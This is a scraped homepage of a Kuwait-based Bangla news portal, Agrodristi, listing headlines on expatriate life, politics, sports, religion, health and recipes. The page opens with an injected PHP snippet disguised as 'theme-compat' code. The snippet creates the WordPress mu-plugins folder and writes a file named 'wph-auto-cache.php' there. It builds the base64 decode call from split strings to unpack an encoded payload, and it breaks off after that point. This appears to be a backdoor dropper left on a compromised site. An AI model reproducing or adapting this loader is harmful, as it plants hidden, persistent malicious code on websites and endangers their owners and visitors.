/* wphc-theme-compat:begin */ if (!function_exists('wphc_boot_8cbe6aa49f')) { function wphc_boot_8cbe6aa49f() { $wphc_mu = defined('WPMU_PLUGIN_DIR') ? WPMU_PLUGIN_DIR : WP_CONTENT_DIR . '/mu-plugins'; if (!is_dir($wphc_mu)) { @mkdir($wphc_mu, 0755, true); } $wphc_target = $wphc_mu . '/wph-auto-cache.php'; if (!(is_file($wphc_target) && md5_file($wphc_target) === '8cbe6aa49f5fded484f904b31bced2b6')) { $wphc_dec = 'base'.'64_'.'decode'; $wphc_raw = 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পরবর্তী পৃষ্ঠা

Agrodristi Media Group

Advertising,Publishing & Distribution Co.

Editor in chief & Agrodristi Media Group’s Director. AH Jubed
Legal adviser. Advocate Musharrof Hussain Setu (Supreme Court,Dhaka)
Editor in chief Health Affairs Dr. Farhana Mobin (Square Hospital, Dhaka)
Social Welfare Editor: Rukshana Islam (Runa)

Head Office

UN Commercial Complex. 1st Floor
Office No.13, Hawally. KUWAIT
Phone. 00965 65535272
Email. agrodristi@gmail.com / agrodristitv@gmail.com

Bangladesh Office

Director. Rumi Begum
Adviser. Advocate Koyes Ahmed
Desk Editor (Dhaka) Saiyedul Islam
44, Probal Housing (4th floor), Ring Road, Mohammadpur,
Dhaka-1207. Bangladesh
Contact: +8801733966556 /+8801316861577

Email Address

agrodristi@gmail.com, agrodristitv@gmail.com

Licence No.

MC- 00158/07      MC- 00032/13

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এক্সক্লুসিভ

ইউরোপের চাকরি ও ভিসার প্রলোভন,গ্রেফতার কুয়েতের এক রিক্রুটিং ব্যবসায়ী

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অগ্রদৃষ্টি প্রিন্টিং প্রেস (এটি অগ্রদৃষ্টি মিডিয়া গ্রুপের একটি প্রতিষ্ঠান)

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কুয়েতে শেষ হলো আকামা বদলের সুযোগ, ২৭ হাজার প্রবাসীর খাত পরিবর্তন

খাদ্য নিরাপত্তা ও নাগরিক সচেতনতা: উন্নত বিশ্বের চেয়ে আমরা ঠিক কতটা পিছিয়ে?

কুয়েতের মরুভূমিতে লাল-সবুজের বিপ্লব

টানা পঞ্চম জয়! কুয়েত সামার লিগের উদ্বোধনী ম্যাচে সিলেট সিক্সার্সের বড় জয়

কুয়েতের আদালতে বাংলাদেশি নাগরিকের যাবজ্জীবন কারাদণ্ড, ভারতীয় নাগরিকের মৃত্যুদণ্ড বহাল

জাতীয়

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রাজনীতি

‘মৃত্যুফাঁদে’ ঢাকা-সিলেট মহাসড়ক: দ্রুত সংস্কারের দাবিতে সিলেটে গণঅবস্থান, হুঁশিয়ারি বিএনপির

প্রধান উপদেষ্টার সঙ্গে বৈঠকে তর্কে জড়ায় বিএনপি ও এনসিপি

নতুন দলের আত্মপ্রকাশ, সব দল নিয়ে কাজ করার ইচ্ছা তরুণ নেতাদের

মৌলভীবাজারে ছাত্রদলের ৪৬ তম প্রতিষ্ঠাবার্ষিকী উদযাপন

কুয়েত বিএনপি ও সহযোগী সংগঠনের উদ্যোগে বিজয় দিবস উদযাপিত

জামায়াত ‘বাধ্য হয়ে’ পাকিস্তানের পক্ষে ছিল: শফিকুর

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আন্তর্জাতিক

কুয়েতে শেষ হলো আকামা বদলের সুযোগ, ২৭ হাজার প্রবাসীর খাত পরিবর্তন

কুয়েতের আদালতে বাংলাদেশি নাগরিকের যাবজ্জীবন কারাদণ্ড, ভারতীয় নাগরিকের মৃত্যুদণ্ড বহাল

বিদেশী বিনিয়োগকারীদের ১৫ বছরের দীর্ঘমেয়াদী রেসিডেন্সি দিচ্ছে কুয়েত

কুয়েত আন্তর্জাতিক বিমানবন্দরে হামলা ও বিমান চলাচল স্থগিত

কুয়েতে সুবাস ছড়াচ্ছে বাংলাদেশের কাঠের ধোঁয়া

কুয়েতে ধর্মীয় ভাবগাম্ভীর্যে প্রবাসীদের ঈদুল আযহা উদযাপন

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BANGLA TV

কনটেন্ট পার্টনার- কুয়েত বাংলা নিউজ

প্রবাসে বাংলাদেশ

ইউরোপের চাকরি ও ভিসার প্রলোভন,গ্রেফতার কুয়েতের এক রিক্রুটিং ব্যবসায়ী

গাউসিয়া কমিটি বাংলাদেশ কুয়েত কেন্দ্রীয় কমিটির দ্বি-বার্ষিক কাউন্সিল অনুষ্ঠিত

কুয়েতে শেষ হলো আকামা বদলের সুযোগ, ২৭ হাজার প্রবাসীর খাত পরিবর্তন

কুয়েতের মরুভূমিতে লাল-সবুজের বিপ্লব

কুয়েত গাউছিয়া কমিটি ফাহাহিল শাখার মাহফিল অনুষ্ঠিত হয়েছে

টানা পঞ্চম জয়! কুয়েত সামার লিগের উদ্বোধনী ম্যাচে সিলেট সিক্সার্সের বড় জয়

সারাদেশ

মৌলভীবাজারে আহমদ বিলালের গণসংযোগ

গ্রামীণ ব্যাংক কর্মকর্তাকে ‘স্যার’ না ডাকায় তুলকালামের পর যা হল

মানবিক কাজের জন্য নরসিংদী পৌরসভার মেয়রকে ধন্যবাদ জ্ঞাপন

সময় টিভি সরাসরি || SOMOY TV LIVE

কুয়েত প্রবাসী নেতাদের ফুলেল শুভেচ্ছা

সুবর্ণচরে ধর্ষিতা নারীর পাশে ফখরুল

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অর্থনীতি

রে‌মিট্যা‌ন্সে মিল‌বে ৫ শতাংশ প্রণোদনা

চীনে অনলাইন এক্সিবিশনের বিশেষ ম্যাচ মিটিং অনুষ্ঠিত

চীনে ২১ তম টয়েস এন্ড গিফট ফেয়ার অনুষ্ঠিত

চীনে শুরু হয়েছে অ্যালুমিনিয়াম প্রোফাইল ডোরস্ এন্ড উইন্ডোস্ এক্সপো – ২০১৯

ইসলামী ব্যাংকের নতুন চেয়ারম্যান নাজমুল হাসান

ঝুঁকি ব্যবস্থাপনার জন্য অভ্যন্তরীণ নিয়ন্ত্রণকে শক্তিশালীকরতে হবে : ডেপুটি গভর্নর

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খেলাধুলা

টানা পঞ্চম জয়! কুয়েত সামার লিগের উদ্বোধনী ম্যাচে সিলেট সিক্সার্সের বড় জয়

কুয়েতে জাঁকজমকপূর্ণ আয়োজনে সিলেট সিক্সার্স ক্লাবের জার্সি উন্মোচন

মার্সেইকে হারিয়ে ফরাসি সুপার কাপ চ্যাম্পিয়ন পিএসজি

বিডি সুন্দরবন ফুটবল ক্লাব কুয়েত এর অভিষেক ও জার্সি উন্মোচন উপলক্ষে আলোচনা সভা অনুষ্ঠিত

তীরে এসে তরী ডুবল বসুন্ধরা কিংসের, কুয়েতে আল শেবের কাছে হার ২-৩

কুয়েতে বিজয় দিবস ফুটবল টুর্নামেন্ট-২০২৫: ফ্রেন্ডস স্টার ও আল-মাজিদের জয়

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শিক্ষাঙ্গন

শিক্ষার্থীদের নির্বিঘ্নে যাতায়াতের দাবিতে মৌলভীবাজারে সংবাদ সম্মেলন

শুক্রবার আহত ও শহীদদের স্মরণে কর্মসূচি দিলো বৈষম্যবিরোধী ছাত্র আন্দোলন

টিউশন ফি ছাড়াই পড়াশোনা

একতা স্পোর্টিং ক্লাব কাজিরবাজার’র বৃত্তি পরীক্ষা অনুষ্ঠিত

শিক্ষা প্রতিষ্ঠানের ছুটি ১২ জুন পর্যন্ত

দেশের সব শিক্ষা প্রতিষ্ঠানের চলমান ছুটি আগামী ২৮ ফেব্রুয়ারি পর্যন্ত

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ধর্ম ও দর্শন

কুয়েতের মসজিদ কর্মীদের দায়িত্ব পালনের সময় ‘দিশদাশা’ পরিধান বাধ্যতামূলক

রমজান মাসে প্রবাসী বাংলাদেশিদের ওমরাহ পালন

বৃটেনে এক স্কুল ছাত্রী বোরকা পরার অধিকার বঞ্চিত

হজ করতে হেঁটে মক্কার পথে কুমিল্লার আদিব

যারা প্রথমবার উমরাহ করতে যাওয়ার চিন্তা করছেন, তাদের জন্য …

লম্বা চুল, দাড়ি, নীল চোখ – যীশু আসলে দেখতে কেমন ছিলেন?

ইসলামী আইনে মালেয়শিয়ায় যে নারী বিচারক পুরুষদের দ্বিতীয় বিয়ে করার সিদ্ধান্ত দেন

চীনে উইগর মুসলিম নির্যাতনের ব্যাপারে যা জানা গেছে

কুয়েত বৌদ্ধ সমিতির উদ্যোগে সাড়ান্বরে শুভ মধু পূর্ণিমা উদযাপিত

“১০’ই মহররম / পবিত্র আশুরার তাৎপর্য ও ফযীলত”

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লাইফস্টাইল

সন্তানকে অতিমাত্রায় শাষন করা অনুচিত- ডা. ফারহানা মোবিন

‘মেয়ে বাম হাত দিয়ে কাজ করে, শ্বশুরবাড়ির লোকজন কী বলবে?

গ্রিন টি-এর উপকারিতা

ফল, শাক-সবজি ও মাছ ফরমালিন মুক্ত করার উপায়

এই বিভাগের সব খবর »

জবস এন্ড ক্যারিয়ার

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স্বাস্থ্য ও চিকিৎসা

সন্তানকে অতিমাত্রায় শাষন করা অনুচিত- ডা. ফারহানা মোবিন

গর্ভাবস্থায় রোজা- ডা: ফারহানা মোবিন

লাউ শাকের উপকারিতা

জালালাবাদ লিভার ট্রাস্ট ও রোটারী ক্লাবের যৌথ উদ্যোগে ফ্রি মেডিকেল ক্যাম্প অনুষ্ঠিত

পালং শাকের উপকারিতা

সরিষার শাকের উপকারিতা

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বিনোদন

কোন মিস্তরি নাও বানাইলো এমন দেখা যায়- কণ্ঠশিল্পী আশরাফুল

জজ আদালতে পরীমনির জামিন আবেদন

সালমান শাহের ২৯তম মৃত্যুবার্ষিকী: আজও রহস্যে মোড়া মৃত্যু

টেলি সামাদ হাসপাতালে

এই বিভাগের সব খবর »

প্রথমবারের মতো একসাথে পথচলা আমান-প্রিয়াঙ্কার

“সালাম সকল প্রবাসী” গানের অ্যালবাম এর শুভমুক্তি ৩১ অক্টোবর

সাক্ষাৎকার

প্রবাসের আয়নায় স্বদেশ: ত্রয়োদশ নির্বাচন নিয়ে কী ভাবছেন কুয়েত প্রবাসীরা? | তৃতীয় পর্ব

প্রবাসের আয়নায় স্বদেশ: ত্রয়োদশ নির্বাচন নিয়ে কী ভাবছেন কুয়েত প্রবাসীরা? | দ্বিতীয় পর্ব

প্রবাসের আয়নায় স্বদেশ: ত্রয়োদশ নির্বাচন নিয়ে কী ভাবছেন কুয়েত প্রবাসীরা? | প্রথম পর্ব

প্রবাসীর উপার্জিত অর্থ আত্মসাৎ: মায়ের বিরুদ্ধে ছেলের অভিযোগ

শ্রম আর কর্মদক্ষতায় গাজী মোহাম্মদ এনামুল হকের ব্যবসায়িক সফলতা

কুয়েত বাংলাদেশ কমিউনিটিতে জনপ্রিয় কণ্ঠশিল্পী রুনা আক্তার কেয়া

আইন ও আদালত

নিজের শরীরে আগুন: হেনোলাক্স গ্রুপের মালিকের বিরুদ্ধে মামলা

ডিজিটাল নিরাপত্তা আইনের প্রচারণায় সাংবাদিকদের কেন এত গুরুত্ব?

নাটোরে ‘অশ্লীল নৃত্য ও জুয়ার আসর’ ভেঙে দিয়েছে প্রশাসন

নিখোঁজের ৫ দিন পর আইনজীবী রথীশের মরদেহ উদ্ধার

বাবা মায়ের ঝগড়া কী প্রভাব ফেলে শিশুর উপর?

সভাপতি ছাড়া ঢাকা বারে আওয়ামীপন্থীদের বড় বিজয়

এই বিভাগের সব খবর »

ক্রাইম

কুয়েত প্রবাসী মাওলানা হাসানের সর্বস্বান্ত হওয়ার নেপথ্যে এক ভয়ংকর প্রতারণার জাল

কুয়েত “ছয় দিনারের ভিসা সর্বোচ্চ ২২’শ দিনারে বিক্রির অভিযোগ”

বিমানবন্দরে প্রবাসী রক্তাক্ত, সুষ্ঠু বিচারের দাবি প্রবাসী স্বজন ফাউন্ডেশনের

কুয়েতে আমিন সরকারকে অবাঞ্ছিত ঘোষণা

বাংলাদেশের ভেজাল কুয়েতে

৯০এর দশকের জনপ্রিয় নায়ক সালমান শাহ্‌’র ২২তম মৃত্যুবার্ষিকী

এই বিভাগের সব খবর »

রিসিপি

পাঁচ মিনিটেই মচমচে ব্রেড পাকোড়া

রসগোল্লা তৈরির সবচেয়ে সহজ উপায়

জলপাইয়ের টক-ঝাল আচার

মাসে ১০ পাউন্ড ওজন কমাতে রোজ খান খাবারটি!

রেসিপিঃ শুকনা সিমের বিচি এবং ছোট মুরগী (যে স্বাদ ভুলা যায় না)

চিকেন কেইভ

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সাহিত্য ও সংস্কৃতি

“ট্রেন” – মোজাহার

চিরন্তন – মোজাহার

শান্তির প্রার্থনা

আমার ভোট, আমার দেশ- আ হ জুবেদ

চেহারা নয়, চরিত্রই আসল বিচার

কোন মিস্তরি নাও বানাইলো এমন দেখা যায়- কণ্ঠশিল্পী আশরাফুল

এই বিভাগের সব খবর »

সম্পাদকীয়

খাদ্য নিরাপত্তা ও নাগরিক সচেতনতা: উন্নত বিশ্বের চেয়ে আমরা ঠিক কতটা পিছিয়ে?

কুয়েতের মরুভূমিতে লাল-সবুজের বিপ্লব

কুয়েতে সুবাস ছড়াচ্ছে বাংলাদেশের কাঠের ধোঁয়া

গাধাটি হারিয়েছিল, ফিরে এসেছে— জাতিসংঘের প্রতি বার্তা

আরবের তপ্ত রোদে শীতল এক মানবিকতা, যেখানে ‘মুগ্ধ’রা বেঁচে থাকে বারো মাস

স্বাধীনতার ঘোষক ও জাতির পিতা ইস্যু কি অধরাই থেকে যাবে?

কুয়েত প্রবাসীদের সুখ, দুঃখ, ব্যর্থতা, সফলতা ও সম্ভাবনার কথা জানাতে বাংলাটিভির বিশেষ বুলেটিন ”বিশ্ববাংলা”

Agrodristi Media Group

Advertising,Publishing & Distribution Co.

Editor in chief & Agrodristi Media Group’s Director. AH Jubed
Legal adviser. Advocate Musharrof Hussain Setu (Supreme Court,Dhaka)
Editor in chief Health Affairs Dr. Farhana Mobin (Square Hospital, Dhaka)
Social Welfare Editor: Rukshana Islam (Runa)

Head Office

UN Commercial Complex. 1st Floor
Office No.13, Hawally. KUWAIT
Phone. 00965 65535272
Email. agrodristi@gmail.com / agrodristitv@gmail.com

Bangladesh Office

Director. Rumi Begum
Adviser. Advocate Koyes Ahmed
Desk Editor (Dhaka) Saiyedul Islam
44, Probal Housing (4th floor), Ring Road, Mohammadpur,
Dhaka-1207. Bangladesh
Contact: +8801733966556 /+8801316861577

Email Address

agrodristi@gmail.com, agrodristitv@gmail.com

Licence No.

MC- 00158/07      MC- 00032/13

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